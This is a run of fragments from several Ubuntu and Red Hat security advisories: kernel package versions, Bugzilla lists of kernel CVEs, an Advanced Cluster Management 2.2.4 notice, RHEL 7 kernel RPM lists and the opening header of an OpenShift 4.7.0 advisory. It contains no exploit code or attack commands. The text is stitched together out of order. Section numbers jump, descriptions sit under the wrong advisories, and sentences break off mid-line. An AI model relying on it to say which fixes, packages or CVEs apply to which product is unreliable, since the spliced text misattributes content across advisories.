4.15.0.99.89\n\nUbuntu 16.04 LTS:\n  linux-image-4.15.0-1038-oracle  4.15.0-1038.42~16.04.1\n  linux-image-4.15.0-1061-gcp     4.15.0-1061.65\n  linux-image-4.15.0-1066-aws     4.15.0-1066.70~16.04.1\n  linux-image-4.15.0-1082-azure   4.15.0-1082.92~16.04.1\n  linux-image-4.15.0-99-generic   4.15.0-99.100~16.04.1\n  linux-image-4.15.0-99-generic-lpae  4.15.0-99.100~16.04.1\n  linux-image-4.15.0-99-lowlatency  4.15.0-99.100~16.04.1\n  linux-image-aws-hwe             4.15.0.1066.66\n  linux-image-azure               4.15.0.1082.81\n  linux-image-azure-edge          4.15.0.1082.81\n  linux-image-gcp                 4.15.0.1061.75\n  linux-image-generic-hwe-16.04   4.15.0.99.106\n  linux-image-generic-lpae-hwe-16.04  4.15.0.99.106\n  linux-image-gke                 4.15.0.1061.75\n  linux-image-lowlatency-hwe-16.04  4.15.0.99.106\n  linux-image-oem                 4.15.0.99.106\n  linux-image-oracle              4.15.0.1038.31\n  linux-image-virtual-hwe-16.04   4.15.0.99.106\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. Bugs fixed (https://bugzilla.redhat.com/):\n\n1733495 - BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:974\n1759052 - CVE-2019-15925 kernel: out-of-bounds access in function hclge_tm_schd_mode_vnet_base_cfg\n1760100 - CVE-2019-15917 kernel: use-after-free in drivers/bluetooth/hci_ldisc.c\n1760310 - CVE-2019-16231 kernel: null-pointer dereference in drivers/net/fjes/fjes_main.c\n1760420 - CVE-2019-16233 kernel: null pointer dereference in drivers/scsi/qla2xxx/qla_os.c\n1774946 - CVE-2019-19072 kernel: A memory leak in the predicate_parse() function in kernel/trace/trace_events_filter.c allows for a DoS\n1774963 - CVE-2019-19068 kernel: A memory leak in the rtl8xxxu_submit_int_urb() function in drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c allows for a DoS\n1774988 - CVE-2019-19046 kernel: Denial Of Service in the __ipmi_bmc_register() function in drivers/char/ipmi/ipmi_msghandler.c\n1775015 - CVE-2019-19063 kernel: Two memory leaks in the rtl_usb_probe() function in drivers/net/wireless/realtek/rtlwifi/usb.c allow for a DoS\n1775021 - CVE-2019-19062 kernel: memory leak in the crypto_report() function in crypto/crypto_user_base.c allows for DoS\n1775097 - CVE-2019-19056 kernel: A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/net/wireless/marvell/mwifiex/pcie.c allows to cause DoS\n1777418 - CVE-2019-18808 kernel: memory leak in ccp_run_sha_cmd() function in drivers/crypto/ccp/ccp-ops.c\n1777449 - CVE-2019-18809 kernel: memory leak in  af9005_identify_state() function in drivers/media/usb/dvb-usb/af9005.c\n1779046 - RT host hang with Call Trace \"WARNING: CPU: 16 PID: 153 at kernel/smp.c:333 smp_call_function_single_async+0x7a/\"\n1779594 - CVE-2019-19332 Kernel: kvm: OOB memory write via kvm_dev_ioctl_get_cpuid\n1781679 - CVE-2019-19447 kernel: mounting a crafted ext4 filesystem image, performing some operations, and unmounting can lead to a use-after-free in ext4_put_super in fs/ext4/super.c\n1781810 - CVE-2019-19543 kernel: use-after-free in serial_ir_init_module() in drivers/media/rc/serial_ir.c\n1783459 - CVE-2019-19524 kernel: a malicious USB device in the drivers/input/ff-memless.c leads to use-after-free\n1783534 - CVE-2019-19533 kernel: information leak bug caused  by a malicious USB device in the drivers/media/usb/ttusb-dec/ttusb_dec.c\n1783561 - CVE-2019-19537 kernel: race condition caused by a malicious USB device in the USB character device driver layer\n1784130 - CVE-2019-19319 kernel: out-of-bounds write in ext4_xattr_set_entry in fs/ext4/xattr.c\n1786160 - CVE-2019-19767 kernel: use-after-free in __ext4_expand_extra_isize and ext4_xattr_set_entry related to fs/ext4/inode.c and fs/ext4/super.c\n1786179 - CVE-2019-19770 kernel: use-after-free in debugfs_remove in fs/debugfs/inode.c\n1790063 - CVE-2019-20054 kernel: Null pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c\n1802555 - CVE-2020-8649 kernel: invalid read location in vgacon_invert_region function in drivers/video/console/vgacon.c\n1802559 - CVE-2020-8648 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c\n1802563 - CVE-2020-8647 kernel: out-of-bounds read in in vc_do_resize function in drivers/tty/vt/vt.c\n1817718 - CVE-2020-10942 kernel: vhost-net: stack overflow in get_raw_socket while checking sk_family field\n1819377 - CVE-2019-9458 kernel: use after free due to race condition in the video driver leads to local privilege escalation\n1819399 - CVE-2019-9455 kernel: kernel pointer leak due to WARN_ON statement in video driver leads to local information disclosure\n1822077 - CVE-2020-12826 kernel: possible to send arbitrary signals to a privileged (suidroot) parent process\n1824059 - CVE-2019-20636 kernel: out-of-bounds write via crafted keycode table\n1824792 - CVE-2020-11668 kernel: mishandles invalid descriptors in drivers/media/usb/gspca/xirlink_cit.c\n1824918 - CVE-2020-11565 kernel: out-of-bounds write in mpol_parse_str function in mm/mempolicy.c\n1831399 - CVE-2020-10732 kernel: uninitialized kernel data leak in userspace coredumps\n1832543 - CVE-2020-12655 kernel: sync of excessive duration via an XFS v5 image with crafted metadata\n1832876 - CVE-2020-12659 kernel: xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write which could result in crash and data coruption\n1833196 - adaptive-tick appears to not be functioning as expected on RHEL 8.2 RT\n1834845 - CVE-2020-12770 kernel: sg_write function lacks an sg_remove_request call in a certain failure case\n1839634 - CVE-2020-10751 kernel: SELinux netlink permission check bypass\n1843410 - RT guest get Call Trace \"INFO: task ld:274531 blocked for more than 600 seconds.\"\n1846964 - CVE-2020-10774 kernel: possibility of memory disclosure when reading the file /proc/sys/kernel/rh_features\n1852298 - Install VM fails and RT host get Call Trace \"WARNING: CPU: 18 PID: 2947 at fs/eventfd.c:68 eventfd_signal+0x7e/0x90\"\n1859590 - [efi]RT kernel crash with \"rcu: INFO: rcu_preempt detected stalls on CPUs/tasks\"\n1860065 - CVE-2020-0305 kernel: possible use-after-free due to a race condition in cdev_get of char_dev.c\n1874311 - CVE-2020-14381 kernel: referencing inode of removed superblock in get_futex_key() causes UAF\n1881424 - CVE-2020-25641 kernel: soft-lockups in iov_iter_copy_from_user_atomic() could result in DoS\n\n6. Description:\n\nRed Hat Advanced Cluster Management for Kubernetes 2.2.4 images\n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability\nengineers face as they work across a range of public and private cloud\nenvironments. \nClusters and applications are all visible and managed from a single\nconsole\u2014with security policy built in. See\nthe following Release Notes documentation, which will be updated shortly\nfor\nthis release, for additional details about this release:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana\ngement_for_kubernetes/2.2/html/release_notes/\n\nSecurity fixes:\n\n* redisgraph-tls: redis: integer overflow when configurable limit for\nmaximum supported bulk input size is too big on 32-bit platforms\n(CVE-2021-21309)\n\n* console-header-container: nodejs-netmask: improper input validation of\noctal input data (CVE-2021-28092)\n\n* console-container: nodejs-is-svg: ReDoS via malicious string\n(CVE-2021-28918)\n\nBug fixes: \n\n* RHACM 2.2.4 images (BZ# 1957254)\n\n* Enabling observability for OpenShift Container Storage with RHACM 2.2 on\nOCP 4.7 (BZ#1950832)\n\n* ACM Operator should support using the default route TLS (BZ# 1955270)\n\n* The scrolling bar for search filter does not work properly (BZ# 1956852)\n\n* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)\n\n* The proxy setup in install-config.yaml is not worked when IPI installing\nwith RHACM (BZ# 1960181)\n\n* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)\n\n* Observability Thanos store shard crashing - cannot unmarshall DNS message\n(BZ# 1967890)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms\n1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string\n1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data\n1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7\n1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory\n1954506 - [DDF] Table does not contain data about 20 clusters. Now it\u0027s difficult to estimate CPU usage with larger clusters\n1954535 - Reinstall Submariner - No endpoints found on one cluster\n1955270 - ACM Operator should support using the default route TLS\n1956852 - The scrolling bar for search filter does not work properly\n1957254 - RHACM 2.2.4 images\n1959426 - Limits on Length of MultiClusterObservability Resource Name\n1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM. \n1963128 - [DDF] Please rename this to \"Amazon Elastic Kubernetes Service\"\n1966513 - Unable to make SSH connection to a Bitbucket server\n1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error. \n1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message\n\n5. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\nSecurity Fix(es):\n\n* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)\n\n* kernel: Use after free via PI futex state (CVE-2021-3347)\n\n* kernel: use-after-free in n_tty_receive_buf_common function in\ndrivers/tty/n_tty.c (CVE-2020-8648)\n\n* kernel: Improper input validation in some Intel(R) Graphics Drivers\n(CVE-2020-12363)\n\n* kernel: Null pointer dereference in some Intel(R) Graphics Drivers\n(CVE-2020-12364)\n\n* kernel: Speculation on pointer arithmetic against bpf_context pointer\n(CVE-2020-27170)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel crash when call the timer function\n(sctp_generate_proto_unreach_event) of sctp module (BZ#1707184)\n\n* SCSI error handling process on HP P440ar controller gets stuck\nindefinitely in device reset operation (BZ#1830268)\n\n* netfilter: reproducible deadlock on nft_log module autoload (BZ#1858329)\n\n* netfilter: NULL pointer dereference in nf_tables_set_lookup()\n(BZ#1873171)\n\n* [DELL EMC 7.9 Bug]: No acpi_pad threads on top command for \"power cap\npolicy equal to 0 watts\" (BZ#1883174)\n\n* A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e\ndriver causes a use after free condition of the kmalloc-4096 slab cache. \n(BZ#1886003)\n\n* netxen driver performs poorly with RT kernel (BZ#1894274)\n\n* gendisk-\u003edisk_part_tbl-\u003elast_lookup retains pointer after partition\ndeletion (BZ#1898596)\n\n* Kernel experiences panic in update_group_power() due to division error\neven with Bug 1701115 fix (BZ#1910763)\n\n* RHEL7.9 - zfcp: fix handling of FCP_RESID_OVER bit in fcp ingress path\n(BZ#1917839)\n\n* RHEL7.9 - mm/THP: do not access vma-\u003evm_mm after calling handle_userfault\n(BZ#1917840)\n\n* raid: wrong raid io account (BZ#1927106)\n\n* qla2x00_status_cont_entry() missing upstream patch that prevents\nunnecessary ABRT/warnings (BZ#1933784)\n\n* RHEL 7.9.z - System hang caused by workqueue stall in qla2xxx driver\n(BZ#1937945)\n\n* selinux: setsebool can trigger a deadlock (BZ#1939091)\n\n* [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on\nHyper-V (BZ#1941841)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1802559 - CVE-2020-8648 kernel: use-after-free in n_tty_receive_buf_common function in drivers/tty/n_tty.c\n1922249 - CVE-2021-3347 kernel: Use after free via PI futex state\n1930246 - CVE-2020-12362 kernel: Integer overflow in Intel(R) Graphics Drivers\n1930249 - CVE-2020-12363 kernel: Improper input validation in some Intel(R) Graphics Drivers\n1930251 - CVE-2020-12364 kernel: Null pointer dereference in some Intel(R) Graphics Drivers\n1940627 - CVE-2020-27170 kernel: Speculation on pointer arithmetic against bpf_context pointer\n1941841 - [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on Hyper-V\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-1160.31.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.31.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.31.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nSource:\nkernel-3.10.0-1160.31.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.31.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.31.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-1160.31.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.31.1.el7.noarch.rpm\n\nppc64:\nbpftool-3.10.0-1160.31.1.el7.ppc64.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debug-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-devel-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-headers-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-tools-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.ppc64.rpm\nperf-3.10.0-1160.31.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\npython-perf-3.10.0-1160.31.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-3.10.0-1160.31.1.el7.ppc64le.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.ppc64le.rpm\nperf-3.10.0-1160.31.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\npython-perf-3.10.0-1160.31.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\n\ns390x:\nbpftool-3.10.0-1160.31.1.el7.s390x.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-debug-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-devel-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-headers-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-kdump-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-1160.31.1.el7.s390x.rpm\nperf-3.10.0-1160.31.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\npython-perf-3.10.0-1160.31.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-1160.31.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nbpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm\n\nppc64le:\nbpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm\n\nx86_64:\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-1160.31.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm\nkernel-doc-3.10.0-1160.31.1.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-1160.31.1.el7.x86_64.rpm\nbpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-3.10.0-1160.31.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-3.10.0-1160.31.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. 7) - noarch, x86_64\n\n3. \n\nBug Fix(es):\n\n* lru-add-drain workqueue on RT is allocated without being used\n(BZ#1894587)\n\n* kernel-rt: update to the latest RHEL7.9.z source tree (BZ#1953118)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: OpenShift Container Platform 4.7.0 security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2020:5633-01\nProduct:           Red Hat OpenShift Enterprise\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2020:5633\nIssue date:        2021-02-24\nCVE Names:         CVE-2018-10103 CVE-2018-10105 CVE-2018-14461 \n                   CVE-2018-14462 CVE-2018-14463 CVE-2018-14464 \n                   CVE-2018-14465 CVE-2018-14466 CVE-2018-14467 \n                   CVE-2018-14468 CVE-2018-14469 CVE-2018-14470 \n                   CVE-2018-14553 CVE-2018-14879 CVE-2018-14880 \n                   CVE-2018-14881 CVE-2018-14882 CVE-2018-16227 \n                   CVE-2018-16228 CVE-2018-16229 CVE-2018-16230 \n                   CVE-2018-16300 CVE-2018-16451 CVE-2018-16452 \n                   CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 \n                   CVE-2019-6977 CVE-2019-6978 CVE-2019-8625 \n                   CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 \n                   CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 \n                   CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 \n                   CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 \n                   CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 \n                   CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 \n                   CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 \n                   CVE-2019-8846 CVE-2019-9455 CVE-2019-9458 \n                   CVE-2019-11068 CVE-2019-12614 CVE-2019-13050 \n                   CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 \n                   CVE-2019-15165 CVE-2019-15166 CVE-2019-15903 \n                   CVE-2019-15917 CVE-2019-15925 CVE-2019-16167 \n                   CVE-2019-16168 CVE-2019-16231 CVE-2019-16233 \n                   CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 \n                   CVE-2019-18197 CVE-2019-18808 CVE-2019-18809 \n                   CVE-2019-19046 CVE-2019-19056 CVE-2019-19062 \n                   CVE-2019-19063 CVE-2019-19068 CVE-2019-19072 \n                   CVE-2019-19221 CVE-2019-19319 CVE-2019-19332 \n                   CVE-2019-19447 CVE-2019-19524 CVE-2019-19533 \n                   CVE-2019-19537 CVE-2019-19543 CVE-2019-19602 \n                   CVE-2019-19767 CVE-2019-19770 CVE-2019-19906 \n                   CVE-2019-19956 CVE-2019-20054 CVE-2019-20218 \n                   CVE-2019-20386 CVE-2019-20387 CVE-2019-20388 \n                   CVE-2019-20454 CVE-2019-20636 CVE-2019-20807 \n                   CVE-2019-20812 CVE-2019-20907 CVE-2019-20916 \n                   CVE-2020-0305 CVE-2020-0444 CVE-2020-1716 \n                   CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 \n                   CVE-2020-1971 CVE-2020-2574 CVE-2020-2752 \n                   CVE-2020-2922 CVE-2020-3862 CVE-2020-3864 \n                   CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 \n                   CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 \n                   CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 \n                   CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 \n                   CVE-2020-6405 CVE-2020-7595 CVE-2020-7774 \n                   CVE-2020-8177 CVE-2020-8492 CVE-2020-8563 \n                   CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 \n                   CVE-2020-8623 CVE-2020-8624 CVE-2020-8647 \n                   CVE-2020-8648 CVE-2020-8649 CVE-2020-9327 \n                   CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 \n                   CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 \n                   CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 \n                   CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 \n                   CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 \n                   CVE-2020-10732 CVE-2020-10749 CVE-2020-10751 \n                   CVE-2020-10763 